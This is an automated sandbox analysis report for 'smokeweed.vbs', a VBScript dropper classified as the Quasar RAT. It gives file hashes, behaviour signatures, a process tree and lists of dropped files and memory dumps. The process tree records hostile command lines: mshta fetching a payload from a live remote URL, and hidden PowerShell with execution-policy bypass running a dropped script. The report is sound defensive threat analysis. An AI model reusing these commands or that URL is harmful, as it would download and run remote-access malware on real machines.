Overview

overview

10

Static

static

smokeweed.vbs

windows7_x64

10

smokeweed.vbs

windows10_x64

10

Analysis

  • max time kernel
    24s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    26-02-2021 08:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    smokeweed.vbs

  • Size

    3KB

  • MD5

    07b8be238ea7e4d28ab60dd6c485f663

  • SHA1

    73c2226a8592f0a729a837013d40e5b55ecb4415

  • SHA256

    78a881cbc86ce0458d8db0eae0c92a8e016537796ef3ab7928037f4a51d4ca2f

  • SHA512

    9d1bcf4a17c4b7986e2fec74f0d4ba020ea2e4933ff9cad19a639d87f0998a32439a227bcd55bf37d08886276a11ede28f06a60af12b6a368b5cdbd2544cf7a0

Score
10/10
quasarspywaretrojan

Malware Config

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Blocklisted process makes network request 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:292
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs" /elevate
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://z.zz.ht/bBtXS.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1792

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    445e625b0e5c155c88686d118ea2bf81

    SHA1

    a96aa3a608e8d51cc77f6fd26545fb1500fca707

    SHA256

    db8990261e2fb46cafc5e008d7e50a0494d24ad666d31812137ad753250fa7fa

    SHA512

    5850920b93438b970671038900c14663fb506e085c7acf5c3494059cc6114cc5ae2c8b468acc56dcb0be77adc3417a7206ee81a5614eac3cdc3a5118391f0e70

    Download Submit
  • C:\Users\Public\Datax.ps1
    MD5

    c85a52e535d54935f25bc43e8b393b1a

    SHA1

    963baebff776005de53b5c68608c5c5205400b50

    SHA256

    0545f59b84c4323711d72e396797694068bd7a56695aea0cdd90352a4a0c7753

    SHA512

    729398ee2dbb41b6f38c106dd3a75fbb695f700b009e6f5267f4242588764a5b3b407b7e2fbb17f9fd4cfc8684e04c39c2e68b6b400de750c2c2c4967d49f184

    Download Submit
  • memory/292-2-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/292-4-0x00000000024A0000-0x00000000024A4000-memory.dmp
    Filesize

    16KB

    Download
  • memory/708-11-0x000007FEF3D20000-0x000007FEF470C000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/708-9-0x0000000000000000-mapping.dmp
    Download
  • memory/708-12-0x0000000001F10000-0x0000000001F11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/708-13-0x000000001A9E0000-0x000000001A9E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/708-14-0x00000000022C0000-0x00000000022C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/708-15-0x000000001A7E0000-0x000000001A7E2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/708-16-0x000000001A7E4000-0x000000001A7E6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/708-17-0x0000000002470000-0x0000000002471000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1352-8-0x000007FEF6A60000-0x000007FEF6CDA000-memory.dmp
    Filesize

    2.5MB

    Download
  • memory/1440-19-0x0000000002560000-0x0000000002564000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1440-3-0x0000000000000000-mapping.dmp
    Download
  • memory/1680-24-0x000000001AC90000-0x000000001AC92000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1680-47-0x0000000002750000-0x0000000002751000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1680-22-0x000007FEF3D20000-0x000007FEF470C000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/1680-28-0x000000001AC94000-0x000000001AC96000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1680-50-0x0000000002760000-0x0000000002766000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1680-30-0x000000001BA30000-0x000000001BA31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1680-31-0x0000000002630000-0x0000000002631000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1680-34-0x0000000002700000-0x0000000002701000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1680-46-0x0000000002740000-0x0000000002741000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1680-18-0x0000000000000000-mapping.dmp
    Download
  • memory/1680-48-0x000000001BB00000-0x000000001BB01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1680-49-0x000000001AC9A000-0x000000001ACB9000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1760-6-0x0000000000000000-mapping.dmp
    Download
  • memory/1792-51-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize

    376KB

    Download
  • memory/1792-52-0x000000000045819E-mapping.dmp
    Download
  • memory/1792-53-0x00000000746C0000-0x0000000074DAE000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/1792-54-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize

    376KB

    Download
  • memory/1792-56-0x0000000004740000-0x0000000004741000-memory.dmp
    Filesize

    4KB

    Download